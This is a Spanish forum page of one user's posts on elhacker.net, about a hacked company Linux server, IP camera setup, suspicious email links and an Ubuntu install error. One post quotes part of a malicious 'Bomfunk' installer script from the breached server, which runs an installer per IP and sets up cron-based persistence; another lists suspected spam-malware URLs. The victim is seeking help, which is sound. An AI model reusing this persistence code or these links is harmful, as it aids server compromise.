elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: 1 2 [3] 4
21  Seguridad Informática / Seguridad / Re: Hackearon la empresa -confirmado en: 3 Abril 2012, 03:30 am
gracias por las respuestas , pero me surjen dudas: como hicieron para metersere? con fuerza bruta?? esos codigos q significan ??y si ya cambie la clave de root ya no tendria problemas?
22  Seguridad Informática / Seguridad / Hackearon la empresa -confirmado en: 1 Abril 2012, 04:05 am
saludos para todos

les cuento:

trabajo para una empresa dedicada ala compra y venta de insumos farmacologicos, en los puntos de venta tenemos instalado el sistema operativo: Centos y en otros red hat o sea todo lo trabajamos con linux y ademas tenemos un software empresarial q tambien solo funciona con linux...hace poco instalamos un nuevo punto con Centos y con un nuevo motor de base de datos: Postgres ya que normalmente utilizamos Informix... tuvimos el descuido en dejar una clave de root muy facil y despues de unos dias nos dimos cuenta que ni siquiera podiamos entrar por ssh (desde otro pc) y tampoco en el punto de venta, luego de varios procedimientos logramos ingresar por root y pues encontramos una carpeta sospechosa, se llama asi  /opt  y estaba en /root

dentro de esta carpeta hay dos subcarpetas llamadas aubit4gl (averigue es un emulador de base de datos)   y  la otra: bomfunk (no se que es)
dentro de aubit4gl hay mas subcarpetas con archivos planos los cuales tienen codigo sql y otras cosas mas por ej: hay una subcarpeta /bin con archivos: adbaccess, adecompile, amake, sql_parse, otra subcarpeta /etc con archivos boostrap, configsub  y hay muchos mas archivos la otra bomfunk tiene mas archivos  con codigos y textos en ingles como si fueran conversaciones

entons pregunto
-todo esto hace parte de algun programa?
-cual es la finalidad de estos programas?
-que tan grave es?
-que debo hacer para evitarlos?

agradezco la ayuda y colaboracion---

un archivo de esos dice asi (si alguien sabe y me informa que significa)
#!/bin/bash
if [ $# != 1 ]; then
   echo "######Un cadou de la Riko pentru Bomfunk######"
       echo "#+#+#+ bine lucrat hackere !!"
        echo "Tasteaza : ./start canal "
   echo "P.S : fara diez!"
        exit;
fi
/sbin/ifconfig | grep -v "inet6" |grep "inet" | tr ':' ' '| awk '{ print $3 }' |grep -v "127.0.0.1" > vhosts
nrs=`cat vhosts | grep -c .`
######variabile######
D=1
B=./vhosts
######install######
echo "######Un cadou de la Riko pentru Bomfunk######"
echo "@@@@ bine lucrat hackere !!"
sleep 1
echo "Am gasit $nrs ip-uri"
sleep 1
while read line; do
   ./inst $1 $line
case "$D" in
"1")
echo -e "\b\.\c"
D=2
echo -e "\b\...\c"
D=4
;;
"4")
echo -e "\b\....\c"
D=1
;;
esac
 done < $B
echo -e "\bGata"
./autorun
./run
#!/bin/sh
pwd > mech.dir
dir=$(cat mech.dir)
echo "* * * * * $dir/update >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep update
echo "#!/bin/sh
if test -r $dir/m.pid; then
pid=\$(cat $dir/m.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd $dir
23  Comunicaciones / Redes / Re: instalar camaras ip con modem tipo servidor en: 19 Diciembre 2011, 00:32 am
ok muchas gracias por las respuestas, voy es a empezar a mirar las opciones del router , por ahi un dlink dir-600 , claro oajhal y me aprueben el presupuesto porque serian 20 routers para 20 puntos de venta.. esperemos a ver q sucede

 :laugh: :laugh:
24  Comunicaciones / Redes / instalar camaras ip con modem tipo servidor en: 15 Diciembre 2011, 05:36 am
hola compañeros

alguien me podria  ayudar , es q tengo q instalar camaras ip en la empresa y pues yo se como hacerlo por medio de un router adicional , haciendo un mapeo de puertos con la ip fija y configurando la camara con el software q trae, tengo buena teoria q he recopilado por internet

la vuelta es q en muchos puntos de venta aprox 20 no tengo router y me tocaria con el modem q me da el ISP, y este tiene una configuracion tipo servidor es decir tiene una ip publica una mask y gateway q hacen parte de un pool de direcciones, estos modems no tienen el PAT habilitado y pues ahi ni idea como hacerlo ,..

cualquier ayuda estare muy agradecido
 ;D ;D
25  Seguridad Informática / Seguridad / Re: Son virus?? en: 17 Julio 2011, 19:36 pm
gracias señores por sus respuestas  , algo asi me imaginaba q era algo de codigo malicioso con spam,  afortunadamente soy muy cauteloso y nunca abro esos links , pero tenia la duda de q eran exactamente...   gracias de nuevo
 ::) ::)
26  Seguridad Informática / Seguridad / Son virus?? en: 15 Julio 2011, 05:54 am
hola muchachos  ahce poco recibi un correo en mi cuenta de hotmail , de uno de mis contactos el cual asegura no haber enviado nada,  el mensaje esta sin asunto y solo estan estos links:

hello! http://_  www.leonardobieber.it/indexwx4.php?gshowtopic=47iy

.. http://_ kaireiss.de/indexwx4.php?xugmailID=1ysx


no me atrevo a darles click no se lo q es , cuando veo algo asi simplemente borro el mensaje, pero le pregunto a los expertos q significa ese link ?? quien los coloca ?? como se propagan?


gracias

 ::) ::)
27  Sistemas Operativos / GNU/Linux / Re: Error al instalar Ubuntu 10.04 en: 22 Marzo 2011, 01:35 am
hola perdon la tardanza estuve muy ocupado estos dias

pero bueno segun la foto donde dice

ATA/IDE mode  solo tiene las opciones ENHANCED O LEGACY

siempre ha estado en ENHANCED

las otras son automatic mode y S.M.A.R.T solo tienen ENABLE O DISABLE


no se pero yo creo q es el disco duro el q esta fallando y eso q es nuevo , pero lo raro es q y alogre instalar Centos
28  Sistemas Operativos / GNU/Linux / Re: Error al instalar Ubuntu 10.04 en: 16 Marzo 2011, 03:48 am
Hola compañero mira, q lo mas aproximado q encontre en la BIOS es esto pero de resto no vi algo parecido no se si sera aqca q tengo q cambiar el dato q me dices o q..  gracias


29  Sistemas Operativos / GNU/Linux / Re: Error al instalar Ubuntu 10.04 en: 16 Marzo 2011, 02:48 am
Hola , gracias,  efectivamente  tengo en el otro disco duro windows XP, y en este ya tengo el centos montado , y los dos discos son SATA..  cual seria el paso a seguir ???
30  Sistemas Operativos / GNU/Linux / Error al instalar Ubuntu 10.04 en: 15 Marzo 2011, 04:35 am
Saludos para todos, les cuento cual es mi problema:


Tengo un disco duro SATA marca Hitachi de 160 Gb, nuevecito.  A este disco ya le instale una distro de Linux: Centos 5.3 el cual funciona bien y tiene 7 particiones y en el espacio libre q son 50 Gb aprox quiero montar el Ubuntu 10.04 , pero cuando inicio con el CD-ROM de instalacion, elijo el idioma y enseguida me sale este error:

error fsyncing/closing/dev/sda:input/output error


y despues de eso se bloquea el teclado y no puedo seguir adelante , me toca dejar ahi el proceso..

Agradezco cualquier ayuda, gracias

 ::) ::)
Páginas: 1 2 [3] 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines